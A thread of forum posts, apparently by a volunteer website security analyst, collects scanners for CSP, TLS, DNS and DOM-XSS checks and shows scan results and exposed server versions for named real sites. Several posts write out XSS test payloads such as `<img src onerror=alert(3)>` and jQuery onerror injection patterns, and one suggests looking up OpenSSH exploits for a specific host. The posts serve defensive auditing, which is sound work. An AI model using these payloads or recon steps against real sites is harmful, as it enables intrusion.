(index):1 [DOM] Found 4 elements with non-unique id #search: (More info: -https://goo.gl/9p2vKq) <input id=​"search" type=​"text" name=​"q" class=​"input-text" maxlength=​"255" autocomplete=​"off">​ <input id=​"search" type=​"text" name=​"q" class=​"input-text" maxlength=​"255" autocomplete=​"off">​ <input id=​"search" type=​"text" name=​"q" class=​"input-text" maxlength=​"255" autocomplete=​"off">​ <input id=​"search" type=​"text" name=​"q" class=​"input-text" maxlength=​"255" autocomplete=​"off">​
(index):1 [DOM] Found 3 elements with non-unique id #search_mini_form: (More info: https://goo.gl/9p2vKq) <form id=​"search_mini_form" action=​"-https:​/​/​www.grenson.com/​us/​catalogsearch/​result/​" method=​"get">​…​</form>​ <form id=​"search_mini_form" action=​"-https:​/​/​www.grenson.com/​us/​catalogsearch/​result/​" method=​"get">​…​</form>​ <form id=​"search_mini_form" action=​"-https:​/​/​www.grenson.com/​us/​catalogsearch/​result/​" method=​"get">​…​</form>​
(index):1 [DOM] Found 2 elements with non-unique id #send2: (More info: -https://goo.gl/9p2vKq) <button type=​"submit" class=​"button left" title=​"Login" name=​"send" id=​"send2">​…​</button>​ <button type=​"submit" class=​"button left" title=​"Login" name=​"send" id=​"send2">​…​</button>​
(index):1 Unchecked runtime.lastError: Could not establish connection. Receiving end does not exist.
preload.js:64 [Deprecation] Element.createShadowRoot is deprecated and will be removed in M73, around March 2019. Please use Element.attachShadow instead. See -https://www.chromestatus.com/features/4507242028072960 for more details.
init @ preload.js:64
preload.js:64 [Deprecation] Element.createShadowRoot is deprecated and will be removed in M73, around March 2019. Please use Element.attachShadow instead. See h-ttps://www.chromestatus.com/features/4507242028072960 for more details.
init @ preload.js:64
content-tss.js:2 content-tss.js loaded:  -https://www.google.com/recaptcha/api2/anchor?ar=1&k=6Lft7xkUAAAAAJC3_IM8O68WPOJHvttOTN-1dj74&co=aHR0cHM6Ly93d3cuZ3JlbnNvbi5jb206NDQz&hl=en&type=image&v=PRkVene3wKrZUWATSylf69ja&theme=light&size=normal&cb=4wm1rlpfzp0h
(unknown) hosted page injected
content-ads.js:2 content-ads.js loaded:  -https://www.google.com/recaptcha/api2/anchor?ar=1&k=6Lft7xkUAAAAAJC3_IM8O68WPOJHvttOTN-1dj74&co=aHR0cHM6Ly93d3cuZ3JlbnNvbi5jb206NDQz&hl=en&type=image&v=PRkVene3wKrZUWATSylf69ja&theme=light&size=normal&cb=4wm1rlpfzp0h
content.js:21 Uncaught TypeError: Illegal invocation: Function must be called on an object of type StorageArea
    at content.js:21
fingercounting.js:188 Uncaught DOMException: Failed to read the 'sessionStorage' property from 'Window': Access is denied for this document.
    at Counter.wrapMethod (chrome-extension://ommfjecdpepadiafbnidoiggfpbnkfbj/js/web_accessible/fingercounting.js:188:27)
    at new Counter (chrome-extension://ommfjecdpepadiafbnidoiggfpbnkfbj/js/web_accessible/fingercounting.js:160:12)
    at chrome-extension://ommfjecdpepadiafbnidoiggfpbnkfbj/js/web_accessible/fingercounting.js:250:19
    at chrome-extension://ommfjecdpepadiafbnidoiggfpbnkfbj/js/web_accessible/fingercounting.js:255:3
(unknown) caught WebWorker
content-tss.js:2 content-tss.js loaded:  about:blank
(unknown) hosted page injected
content-ads.js:2 content-ads.js loaded:  about:blank
content-tss.js:2 content-tss.js loaded:  about:blank
(unknown) hosted page injected
content-ads.js:2 content-ads.js loaded:  about:blank
content-tss.js:2 content-tss.js loaded:  -https://www.google.com/recaptcha/api2/bframe?hl=en&v=PRkVene3wKrZUWATSylf69ja&k=6Lft7xkUAAAAAJC3_IM8O68WPOJHvttOTN-1dj74&cb=amz0tege1pe4
VM29:5 hosted page injected
content-ads.js:2 content-ads.js loaded:  -https://www.google.com/recaptcha/api2/bframe?hl=en&v=PRkVene3wKrZUWATSylf69ja&k=6Lft7xkUAAAAAJC3_IM8O68WPOJHvttOTN-1dj74&cb=amz0tege1pe4
content.js:21 Uncaught TypeError: Illegal invocation: Function must be called on an object of type StorageArea
    at content.js:21
fingercounting.js:188 Uncaught DOMException: Failed to read the 'sessionStorage' property from 'Window': Access is denied for this document.
    at Counter.wrapMethod (chrome-extension://ommfjecdpepadiafbnidoiggfpbnkfbj/js/web_accessible/fingercounting.js:188:27)
    at new Counter (chrome-extension://ommfjecdpepadiafbnidoiggfpbnkfbj/js/web_accessible/fingercounting.js:160:12)
    at chrome-extension://ommfjecdpepadiafbnidoiggfpbnkfbj/js/web_accessible/fingercounting.js:250:19
    at chrome-extension://ommfjecdpepadiafbnidoiggfpbnkfbj/js/web_accessible/fingercounting.js:255:3
-> -https://www.grenson.com/ and -alert()/# returns a "You could go to previous page... etc.

Enjoy, good hunt

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on December 06, 2019, 12:51:23 PM
With Retire.JS as an extension in the browser and retire insecurity today online scanner and also SNYK evaluation (see webhint scanner)
one can establish retirable jQuery libraries, with DOM-XSS scanners possible sources (input that can be eventually controlled) en sources (methods towards such a goal that can be (ab)used.

Also look here at these resources: https://domstorm.skepticfx.com/modules?id=529bbe6e125fac0000000003

Find these flaws, before they find you, see my test results:
https://domstorm.skepticfx.com/modules?id=529bbe6e125fac0000000003
You can for instance use the user script as User Script (ENUM_FUNCTION) inside Tamper Monkey extension, just an idea.

Test an example of DOM-based XSS here open up inbrowser: https://brutelogic.com.br/tests/sinks.html?name=%3Cimg+src+onerror=alert(3)%3E  Read: https://brutelogic.com.br/blog/dom-based-xss-the-3-sinks/
This is
Quote
Object.create (eval at exec_fn (sinks.html?name=<img+src+onerror=alert(3)>:1),

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on December 09, 2019, 03:29:05 PM
Two browser extensions that can extend the info detected here:
https://observatory.mozilla.org/analyze/meedoeninarnhem.nl  a random example with C-grade status

are Recx Security Analyser v.1.3.0.4 (described earlier in this section Tests & other Media topics).

and CSP Evaluator ->
Quote
base-uri 'self';
img-src * data: 'unsafe-inline';
default-src data: * 'unsafe-inline';
frame-ancestors 'self';
manifest-src 'self';
media-src *.readspeaker.com *.speechstream.net 'self';
script-src * 'unsafe-inline' 'unsafe-eval';
object-src 'self';

checkbase-uri
expand_more
check'self'

checkimg-src
expand_more
check*
checkdata:
check'unsafe-inline'

checkdefault-src
expand_more
checkdata:
check*
check'unsafe-inline'

checkframe-ancestors
expand_more
check'self'

checkmanifest-src
expand_more
check'self'

checkmedia-src
expand_more
check*.readspeaker.com
check*.speechstream.net
check'self'

errorscript-src
expand_more
error*
script-src should not allow '*' as source
error'unsafe-inline'
'unsafe-inline' allows the execution of unsafe in-page scripts and event handlers.
help_outline'unsafe-eval'
'unsafe-eval' allows the execution of code injected into DOM APIs such as eval().

help_outlineobject-src
expand_more
help_outline'self'
Can you restrict object-src to 'none' only?


Legend
errorHigh severity finding
errorMedium severity finding
help_outlinePossible high severity finding
removeDirective/value is ignored in this version of CSP
help_outlinePossible medium severity finding
clearSyntax error
info_outlineInformation
checkAll good


Could be also combined with results from https://webcookies.org/cookies/www.arnhem.nl/15998357

Enjoy, my good friends, enjoy,

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on December 10, 2019, 01:45:02 PM
Test websites for Dutch NCSC TLS-guidelines: https://internet.nl/

10 online tool -> https://geekflare.com/ssl-test-certificate/

Check site's cert fingerprint with this here: https://www.grc.com/fingerprints.htm

Each site's authentic security certificate fingerprint (shown above) was just now obtained by GRC's servers from each target web
server. If your web browser sees a different fingerprint for the same certificate (carefully verify the Certificate Name is identical) that
forms strong evidence that something is intercepting your web browser's secure connections and is creating fraudulent site certificates.   

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 14, 2019, 11:14:01 PM
You will find trackers reported, for instance through DNS Query Sniffer tool,
then check here: https://whotracks.me/trackers/gstatic.html
Also compare this search tool with insecure tracking found with Tracker SSL extension.

Enjoy, my good friends. enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 16, 2019, 02:54:39 PM
Looking for alternatives for urlquery dot net, now it is more often down then up:
https://postmodernsecurity.com/2015/09/11/malware-analysis-and-incident-response-tools-for-the-frugal-and-lazy/
Examples from there: https://forum.avast.com/index.php?action=post;topic=129271.735;last_msg=1529228 (random example);
also: https://fortiguard.com/webfilter?q=justshopclub.com
Also do a IP scan: https://www.shodan.io/host/31.192.111.83  to be verified at VT IP relations, you can use VT4Browsers extension.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 25, 2019, 01:42:39 PM
L.S.

Hunting for website errors that could be exploited, I stumbled upon this in the CSP arena:
Often CSP security is wrongly implemented or in cases can be circumvented.
Read: https://github.com/qazbnm456/awesome-web-security  (see the CSP security section)
Also for instance: https://github.com/portswigger/irule-detector

I have this installed in the browser: CSP Evaluator extension.
See response headers in Web Developer extension for particular websites.
Also Evading CSP with DOM-based dangling markup

For instance we have CSP evaluation for https://observatory.mozilla.org/
with a possible medium severity finding with "script-src 'self'".
As 'self' can be problematic if you host JSONP, Angular or user uploaded files.
Which is not true as we check here: https://urlscan.io/result/2170f2aa-7870-4748-b629-7f246e95b6ae#behaviour

Seems folks have only just begun implementing strong Content Security Policies
and evaluating whether some attacker can bypass them.

Also XSS scanning could be worth while: https://labs.detectify.com/2016/04/04/csp-bypassing-form-action-with-reflected-xss/
Can be combined with CSP bypasser via http://attacker.tld/link-subresource (link not found), still something of a push,
so read here: https://news.ycombinator.com/item?id=14077955

For security researchers and analysers/pentesters, this is the season just for some back-up reading on these subjects,
and to further protection againsts such weaknesses. Enjoy, my friends, enjoy,

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)

Title: Re: Tests and other Media topics
Post by: polonus on December 25, 2019, 10:00:59 PM
Random example of such a CSP Evaluation:

CSP Evaluated for the Sucuri SiteChek website: High Security Findings 2.
Quote
errorscript-src [missing]
script-src directive is missing.
expand_more

errorobject-src [missing]
Missing object-src allows the injection of plugins which can execute JavaScript. Can you set it to 'none'?
expand_more


Page meta security headers not set securely set for (missing) /
Upgrade insecure-requests CSP Header HTTP Security Header  RECX Security Analyser.

I would expect an A grade result, not a B+ like: https://observatory.mozilla.org/analyze/sitecheck.sucuri.net

Content Security Policy      -20   Content Security Policy (CSP) implemented unsafely.

This includes 'unsafe-inline' or data: inside script-src, overly broad sources such as https: inside object-src or script-src, or not restricting the sources for object-src or script-src.
Quote
Content Security Policy Analysis
Test   Pass   Info
Blocks execution of inline JavaScript by not allowing 'unsafe-inline' inside script-src      x
Blocks execution of JavaScript's eval() function by not allowing 'unsafe-eval' inside script-src      V
Blocks execution of plug-ins, using object-src restrictions      X
Blocks inline styles by not allowing 'unsafe-inline' inside style-src   X   
Blocks loading of active content over HTTP or FTP      V
Blocks loading of passive content over HTTP or FTP       V      
Clickjacking protection, using frame-ancestors      X
Deny by default, using default-src 'none'      X
Restricts use of the <base> tag by using base-uri 'none', base-uri 'self', or specific origins   X   
Restricts where <form> contents may be submitted by using form-action 'none', form-action 'self', or specific URIs      X
Uses CSP3's 'strict-dynamic' directive to allow dynamic script loading (optional) -
V = green X = red

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 27, 2019, 02:53:30 PM
L.S.

Another evaluation of CSP on this website: -> https://www.sitejabber.com/reviews/htbridge.com
Quote
frame-ancestors 'none'; *
script-src [missing]
script-src directive is missing.
expand_more

errorobject-src [missing]
Missing object-src allows the injection of plugins which can execute JavaScript. Can you set it to 'none'?
Also: https://observatory.mozilla.org/analyze/www.sitejabber.com#third-party
https://observatory.mozilla.org/analyze/www.sitejabber.com
and https://securityheaders.com/?followRedirects=on&hide=on&q=www.sitejabber.com
and https://report-uri.com/home/analyse/https%3A%2F%2Fwww.sitejabber.com%2F   (* same results)

On header security: https://securityheaders.com/?q=https%3A%2F%2Fwww.sitejabber.com%2Freviews%2Fhtbridge.com&followRedirects=on

Also consider: https://webcookies.org/cookies/www.sitejabber.com/28801934?542749

On the hoster: Server: Apache/2.4.18
Quote
The header exposes web server version details. These server no purpose apart from making life of security auditors and hackers easier, leading them straight to exploits for this particular version of product.

No base-uri allows attackers to inject base tags which override the base URI to an attacker-controlled origin. Set to 'none' unless you need to handle tricky relative URLs scheme

Username Enumeration exploit(s) - view host details: https://www.shodan.io/host/52.4.241.179

look for SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.8 exploits

Note: 1. the device may not be impacted by all of these issues. The vulnerabilities are implied based on the software and version.
         2. Another threat with detected Google Tag Manager:
             https://blog.sucuri.net/2018/04/malicious-activities-google-tag-manager.html

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on December 28, 2019, 02:26:48 PM
The State of JavaScript 2019
jQuery just has slightly over 11% of user-base left now: https://2019.stateofjs.com/
React and Angular.js the way to go?

Interesting: https://2019.stateofjs.com/testing/  & https://2019.stateofjs.com/other-tools/

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on December 28, 2019, 04:04:35 PM
Various domain checks: https://www.zonemaster.net/domain_check
The following nameservers failed to resolve to an IP address : -ns-02.avast.com, -ns-06.avast.com.

35% only here: https://en.internet.nl/site/avast.com/735290/
Consider also: https://mxtoolbox.com/SuperTool.aspx?action=mx%3asecurity.nl&run=toolpage#

8 problems found: https://mxtoolbox.com/domain/avast.com/

Just F-grade here: https://observatory.mozilla.org/analyze/avast.com (was an earlier -B grade).

A & C-scan results: https://observatory.mozilla.org/analyze/avast.com#third-party

Not vulnerable to TLS-Robot attack. (https://www.tbs-certificates.co.uk/FAQ/en/outils-scan-ssl-tls.html)

Not compliant: https://observatory.mozilla.org/analyze/avast.com#tls
See for improvement to modern times: https://wiki.mozilla.org/Security/Server_Side_TLS#Modern_compatibility
Moderate: avast.com
New test
YOUR SCORE:
Unfortunately, the tested resource isn’t running on the latest TLS 1.3.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 29, 2019, 10:54:55 PM
A nice collection of tools can be found here ->: https://report-uri.com/home/analyse
Among them an additional CSP Analyser.
Additional CSP inspection and validation ->: https://cspvalidator.org/#url=https://cspvalidator.org/

Checking the one with the other gives
Quote
Valid policy at -> https://report-uri.com/home/analyseView
Raw Policy
Warning
1:462: The child-src directive is deprecated as of CSP level 3. Authors who wish to regulate nested browsing contexts and workers SHOULD use the frame-src and worker-src directives, respectively.

1:502: The upgrade-insecure-requests directive is an experimental directive that will be likely added to the CSP specification.

Info
1:529: A draft of the next version of CSP deprecates report-uri in favour of a new report-to directive.
So well worthy to bookmark this website address, when website developers have need of this addidtional inspection and validation  ;)  (Remember always online nothing is a 100% full proof best policy, todays' standards aren't tomorrow's).

Inside Avast Secure Browser I now use CSP Evaluator extension and CSP Tester extension next to JNote extension,
a JavaScript error notifier.

So we keep collecting various interesting tools for our toolboxes.

Check and test well into the coming new year 2020, my good friends, enjoy.

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on December 29, 2019, 11:33:45 PM
For those that are about to have a Content Security Policy set out,

Inspecting and testing CSP for -https://sitecheck.sucuri.net

I found when validating CSP Strings it had "upgrade-insecure-requests", an experimental directive
that will be likely added to the CSP specification.

Adding scrpt-src gave "directive is missing"
and for "object-src", that when this is missing injections of plug-ins which can execute JS is possible.
So it is better to set it to 'none'.

Just with the online and extension versions of CSP validation that was a lesson we have just learned to-day,
and we were also able to give feedback to the folks behind https://cspvalidator.org/#url=https://report-uri.com/home/analyse

polonus
Title: Re: Tests and other Media topics
Post by: polonus on January 01, 2020, 10:07:56 PM
In the light of what we read here about malicious manipulation of DNS:
https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html

Some online checking of DNS: https://toolbox.googleapps.com/apps/dig/?csrfmiddlewaretoken=k1EQjzk0oBDc5We7ZT4V4vwQ5IqtlIsI&domain=security.nl&typ=A#SRV/

Tests for modern standards: https://en.internet.nl/

Furthermore: https://dnschecker.org  &  https://mxtoolbox.com/DNSCheck-aspx

Checking DNS propagation: https://www.nexcess.net/web-tools/dns-checker/

polonus
Title: Re: Tests and other Media topics
Post by: DavidR on January 01, 2020, 10:28:42 PM
Reference the DNS info above, I can recall, Firefox are introducing addition measures for secure DNS connections, a bit like https secure connections.  I commented on how/if avast would deal with this additional protection level.

This was the post by Asyn:
https://forum.avast.com/index.php?topic=19387.msg1530670#msg1530670 (https://forum.avast.com/index.php?topic=19387.msg1530670#msg1530670)

And my comment:
I wonder if/how this might impact the Avast HTTPS scanning ?
Title: Re: Tests and other Media topics
Post by: polonus on January 01, 2020, 11:46:57 PM
Hi DavidR,

Some issues for DNS resolving will not be fixed as, like for instance PTR request for NIXDOMAINS.
Read: https://blogs.microsoft.com/on-the-issues/2019/12/30/microsoft-court-action-against-nation-state-cybercrime/

The overhaul or even partial overhaul of the DNS infrastructure will not materialize, I am afraid. Not even in a minimal sense.

And considering recent DoH being brought into firefox, there are grieve concerns from some it may just enhance Big Tech's grip.

But I cannot see anything wrong with bringing in Google's site verification, very important when sites are just starting to resolve.

Maybe we should enter into a way of encrypting DNS requests, there are some android apps that can do this.

polonus


Title: Re: Tests and other Media topics
Post by: polonus on January 02, 2020, 11:31:21 AM
An example where digging goes wrong.
DNS lookup fails with "254.242.55.65.in-addr.arpa" for instance.

DNSQuerySniffer, running under the browser, does not come up with a reply and cannot resolve.
You often experience that with PTR requests that involve MS.

So then looked here:
Quote
id 7223
opcode QUERY
rcode NXDOMAIN
flags QR RD RA
;QUESTION
254.242.55.65.in-addr.arpa. IN A
;ANSWER
;AUTHORITY
55.65.in-addr.arpa. 1799 IN SOA ns1.msft.net. msnhst.microsoft.com. 2019121601 7200 900 7200000 3600
;ADDITIONAL
this with toolbox google app's Dig DNS lookup.

Just like we expected NXDOMAIN, not registered domain or as a result of some server hick-up.

Many folks never really studied DNS and the ways to manipulate DNS.
A shame really, for it is an important issue,
playing out everywhere, also in the background (Cloud, Big Tech data retrieving).

Conclusion here "Parties fail to innovate and to overhaul and that even partly",
or just call it like Americans do "sloppiness", whatever.

Info credits go to luntrus,

Vizualize here: https://dnsviz.net/d/security.nl/dnssec/
also see: https://dnssec-debugger.verisignlabs.com/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on January 05, 2020, 06:48:16 PM
Security grade of this search engine webpage: https://www.qwant.com/
Re: https://www.shodan.io/host/194.187.168.100
See: https://webhint.io/scanner/47f3776f-d541-49f3-93c0-a8d2dfb3c168
Cookie & Security Scan report: https://webcookies.org/cookies/www.qwant.com/1128157?673125
Re: B-grade: https://observatory.mozilla.org/analyze/www.qwant.com

Errors in browser console: Refused to load the image 'hxtps://lite.qwant.com/img/v4/header/header-bg-tablet.svg?redirect=OperaMobi13.04&1539938515=' because it violates the following Content Security Policy directive: "img-src blob: 'self' s1.qwant.com s2.qwant.com s.qwant.com data: s-boards.qwant.com s-lite.qwant.com www.qwant.com".

/undefined:1 GET -https://www.qwant.com/undefined 404
Image (async)
replaceInnerHTML @ app.js?1576502819736:3
constructor @ app.js?1576502819736:3
startApplication @ bootstrap.js?1576502819736:196
(anonymous) @ bootstrap.js?1576502819736:140
b.then @ app.js?1576502819736:1
initApplication @ bootstrap.js?1576502819736:139
languageFileLoad @ bootstrap.js?1576502819736:254
load (async)
(anonymous) @ bootstrap.js?1576502819736:224

DOM-XSS issues: Results from scanning URL: -https://www.qwant.com/
Number of sources found: 2
Number of sinks found: 38

and results from scanning URL: -https://www.qwant.com/js/app.js?1576502819736
Number of sources found: 302
Number of sinks found: 1037

and results from scanning URL: -https://www.qwant.com/js/app.js?1576502819736
Number of sources found: 609
Number of sinks found: 291

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on January 14, 2020, 05:39:25 PM
Domain name cert checks.

Combine tests here, for instance: https://www.immuniweb.com/radar/?id=v4BmqgTP
and https://www.immuniweb.com/ssl/ & https://www.immuniweb.com/websec/
also https://www.immuniweb.com/websec/?id=U3EpLj3f (example)
and at https://moz.com/learn/seo/domain

Check: crt.sh for certificate transparancy scans.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on January 20, 2020, 06:22:32 AM
Next to testing with Retire.JS extension inside the browser or https://retire.insecurity.today/
developed by Erlend Oftedal, we can also test at DomStorm's class selector XSS at
-> https://domstorm.skepticfx.com/modules?id=529bbe6e125fac0000000003
Other modules also available.. handy for DOM-XSS searches for sinks and sources.
Other example test: https://domstorm.skepticfx.com/modules?id=559b066c34473500003d257b

Enjoy, my friends, enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on January 20, 2020, 10:01:59 PM
To make the theoretical ideas stand out more practically - when we combine retire.JS -
domstorm repository, SNYK vulners etc., is to know how to protect against this,
especially against abuse combined with payload injectors. (XSSight abuse etc.).

In general: Defenses against XSS
What input do we trust? (browser- and client-side validation)
Does it adhere to expected patterns?
Never simply reflect untrusted data.
Applies to data within our database too.
Encoding of context(Java/attribute/HTML/CSS

polonus
Title: Re: Tests and other Media topics
Post by: polonus on January 21, 2020, 04:25:24 PM
Re: http://research.insecurelabs.org/jquery/test/

Let us take a particular example with known abuse and analyse retirable jQuery library there.
Re: https://www.abuseipdb.com/check/195.62.29.11 *
Check that particular IP for "vulners": https://www.shodan.io/host/195.62.29.11 common OpenSSH abuse...
Site report: https://sitereport.netcraft.com/?url=http%3A%2F%2Fparagon.net.uk
We see an outdated Word Press CMS version there: WordPress Version 4.9.13
We see it has passed various reputation checks (questionable in the light of the abuse report, see above *)
Reputation Check
PASSED
Google Safe Browse:OK
Spamhaus Check:OK
Abuse CC:OK
Dshield Blocklist:OK
Cisco Talos Blacklist:OK

External hosts also Google Safe Browsing approved:
Externally Linked Host   Hosting Provider   Country   
    -www.godaddy.com   GTT Communications Inc.   United States    
    -www.heg.com   Host Europe GmbH   United Kingdom    
    -domains.meshdigital.com   Host Europe GmbH   United Kingdom    
    -www.domainbox.com   Host Europe GmbH   United Kingdom    
    -aboutus.godaddy.net   Dosarrest Internet Security LTD   United States   

For the DOM we go here: https://urlscan.io/result/4c8d465b-1577-496b-9b0c-3c768c8c3dd0

1 Retirable jQuery library: https://retire.insecurity.today/#!/scan/608243a0f733be6600ab4c37808b81dd7dfbaccd646f3cbc5fc5251850d95bfc

DOM-XSS Sinks and Sources there: Results from scanning URL: -https://www.heg.com/wp-includes/js/jquery/jquery.js?ver=1.12.4
Number of sources found: 41
Number of sinks found: 17

Sources, output that could be controlled - .top! .innerHTML= [name= .location. .name write( opener| .parent .open( .op= =top+ "top"
sinks, methods to do so, .value href= data= .src=

The SNYK results from webhint - hint #1: 'jQuery@1.12.4' has 2 known vulnerabilities (2 medium). See 'https://snyk.io/vuln/npm:jquery' for more information@ https://webhint.io/scanner/9d38081f-16c8-4085-a918-baedbc3e3c9c#category-security

We find two requests with regular content  on -https://www.heg.com/wp-includes/js/jquery/jquery.js?ver=1.12.4

Read: https://github.com/jquery/jquery/issues/2432

Also valuable info from: https://webcookies.org/cookies/www.heg.com/28887761?484748
about outdated PHP and excessive server info proliferation; X-Powered-By: PHP/5.4.44
The header exposes web server version details. These serves no purpose apart from making life of security auditors and hackers easier, leading them straight to exploits for this particular version of product - Server: Apache/2.2.15 (CentOS)
-> https://www.centos.org/forums/viewtopic.php?t=65285

Results of vulners webscanner extension for/on HEG website:
Quote
wXw.heg.com
Apache, headers
Not vulnerable
PHP, headers - 5.4.44 vulnerable
7.5

jQuery, headers - 1.3
Not vulnerable
jQuery, script
Not vulnerable
jQuery Migrate, script
Not vulnerable
Bootstrap, script
Not vulnerable
Font Awesome, html
Not vulnerable
Yoast SEO, html - 4.5
Not vulnerable
Wordpress - 4.9.13
Not vulnerable
2017 -Vulners.comvulners.com


polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on January 21, 2020, 11:06:57 PM
Compare malicious IP scans.

Re: https://urlhaus.abuse.ch/url/294136/
IP server info: https://www.shodan.io/host/108.58.8.186
together with Netcraft's site report: https://sitereport.netcraft.com/?url=ool-6c3a08ba.static.optonline.net
Confirmation of scanning and Mirai-like infestations: https://viz.greynoise.io/ip/108.58.8.186

pol
Title: Re: Tests and other Media topics
Post by: polonus on January 22, 2020, 06:14:55 AM
Testing PHP - http://evuln.com/tools/php-security/
There are also free apllications, so I won't give that address for we don't wanna break those  ;)
Also: https://phpstan.org/  as an online tool.
Example test on index.php: https://phpstan.org/r/2976723a-53b1-4698-8984-ccbbdee9b292

https://www.quora.com/How-do-I-view-a-PHP-source-code-of-a-website-just-like-we-see-the-HTML-and-other-codes

Sucuri also has resources: https://wordpress.org/support/topic/sucuri-auditqueue-php-and-other-files/
Re: https://www.unphp.net/decode/788b15af31089576dfcc553a4eddedd0/

Vulners extension for this site -forum.avast.com gives vuln. PHP.headers 5.4.49   7.5
-> https://www.cvedetails.com/vulnerability-list/vendor_id-74/product_id-128/opbyp-1/PHP-PHP.html

Often PHP could mean a "can of worms", specifically outside the kernel source of PHP based CMS like Word Press etc.

General interpretation of web security: https://infosec.mozilla.org/guidelines/web_security

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on February 04, 2020, 05:40:36 PM
L.S.

Linting for javascript errors and flaws, e.g. javascript-validation.
Combine with results from vulners webs scanner extension, Zen Mate Web Firewall extension &
Javascript Error Notifier extension and shodan extension for eventual website server info.

Using an online Javascript Validator: http://beautifytools.com/javascript-validator.php
Tested:  -https://refugiodocapitao.com.br/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1
Number of sources found: 3
Number of sinks found: 0
Linting produced:
Line   Col   Errors
5   1   Missing semicolon.
0   0   Use the function form of "use strict".
26   94   Missing semicolon.
31   146   Use '===' to compare with 'false'.

Scanned for retirable jQuery library: -https://refugiodocapitao.com.br/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1
Detected libraries:
jquery-migrate - 1.4.1 : -https://refugiodocapitao.com.br/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1
No vulnerable libraries found

Line   Col   Errors
222   58   Unnecessary semicolon.
258   18   'options' is defined but never used.
298   22   'e' is defined but never used.
308   28   'e' is defined but never used.
360   35   'options' is defined but never used.
399   1   'new_max' is defined but never used.
424   53   'options' is defined but never used.
475   1   'whCustom' is defined but never used.
530   22   'index' is defined but never used.
460   1   'html_el' is defined but never used.
464   1   'full_slider' is defined but never used.
651   8   Use '===' to compare with '0'.
695   27   'direction' is defined but never used.
751   58   Expected an assignment or function call and instead saw an expression.
760   9   ['jswing'] is better written in dot notation.
760   30   ['swing'] is better written in dot notation.
794   62   A leading decimal point can be confused with a dot: '.3'.
801   62   A leading decimal point can be confused with a dot: '.3'.
808   65   A leading decimal point can be confused with a dot: '.3'.
811   22   A leading decimal point can be confused with a dot: '.5'.
812   71   A leading decimal point can be confused with a dot: '.5'.
834   41   A leading decimal point can be confused with a dot: '.75'.
836   44   A leading decimal point can be confused with a dot: '.9375'.
838   47   A leading decimal point can be confused with a dot: '.984375'.
842   70   A leading decimal point can be confused with a dot: '.5'.
843   60   A leading decimal point can be confused with a dot: '.5'.
843   67   A leading decimal point can be confused with a dot: '.5'.
781   49   Use '===' to compare with '0'.
784   6   Use '===' to compare with '0'.
794   6   Use '===' to compare with '0'.
795   33   's' is already defined.
796   10   's' is already defined.
801   6   Use '===' to compare with '0'.
802   33   's' is already defined.
803   10   's' is already defined.
808   6   Use '===' to compare with '0'.
809   33   's' is already defined.
810   10   's' is already defined.
815   7   Use '===' to compare with 'undefined'.
819   7   Use '===' to compare with 'undefined'.
823   7   Use '===' to compare with 'undefined'.
906   50   'delay' is defined but never used.
1173   17   Use '===' to compare with 'true'.
1289   5   'win' is defined but never used.
1186   22   'avia_is_mobile' is not defined.

Then we gonna compare to detected sinks and sources via a DOM XSS scan:

But here we found sources and sinks in retirable code:
https://retire.insecurity.today/#!/scan/618f3f67a7d9c4e74e7f1378ebe74d92b11d17db042b56d657463ceec95256d0

Detected sources and sinks: .parent, .top, .location, &  location.href. =

Re: https://domstorm.skepticfx.com/ ->https://domstorm.skepticfx.com/modules?id=56b4dfde108b7c00007363ac
Pentest tool like:  https://github.com/lwzSoviet/NoXss

jQuery versions with known weaknesses
Bug 9521 - $("#<img src=x onerror=...>")
Bug 11290 - $("element[attribute='<img src=x onerror=...>'")
jQuery issue 2432 - 3rd party $.get() auto executes if content type is text/javascript
jQuery issue 11974 - parseHTML executes inline scripts like event handlers

enjoy, my good friends, enjoy.

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on February 06, 2020, 11:24:22 PM
Firefox is gonna block websites with T.L.S. 1.0 & 1.1. coming March.
Re: https://hacks.mozilla.org/2020/02/its-the-boot-for-tls-1-0-and-tls-1-1/

Check TLS here: https://www.cdn77.com/tls-test
or here: http://ssl-checker.online-domain-tools.com/
and here: https://www.checktls.com/

Also consider: https://geekflare.com/ssl-test-certificate  or  https://mxtoolbox.com/problem/smtp/smtp-tls
-> https://www.checktls.com/TestReceiver?LEVEL=DETAIL&amp;EMAIL=    (=domain name of mail server).

polonus

Title: Re: Tests and other Media topics
Post by: polonus on February 15, 2020, 02:59:45 PM
Interesting test here: https://hidester.com/webrtc-ip-leak-test/
and more at that site where that came from.
Redirect checker and many other tools here: http://www.internetofficer.com/seo-tool/redirect-check/

Check websites for trackers (check Ghostery & ZenMate Web Firwall extension) here:
(random example): https://whotracks.me/websites/rijmwoordenboek.nl.html

URL analysis: www.theurlanalyzer.com  &  against threats: https://csi.forcepoint.com/  (5 reports a day free access)

polonus
